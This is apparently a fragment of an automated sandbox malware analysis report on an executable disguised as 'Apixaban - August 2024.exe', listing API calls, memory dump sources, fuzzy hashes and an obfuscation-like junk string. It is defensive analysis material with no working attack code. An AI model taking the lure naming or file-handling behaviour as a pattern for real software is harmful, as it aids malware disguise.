                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                APIs
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061DF
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061F3
                                                  • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00406206
                                                • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00403345
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 4115351271-3144792594
                                                • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                                                • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                APIs
                                                • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 2738559852-2559241417
                                                • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                                                • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                APIs
                                                  • Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID:
                                                • API String ID: 849931509-0
                                                • Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                                • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
                                                • Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                                • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405275
                                                  • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004052C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                                • Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
                                                • Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                                • Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                APIs
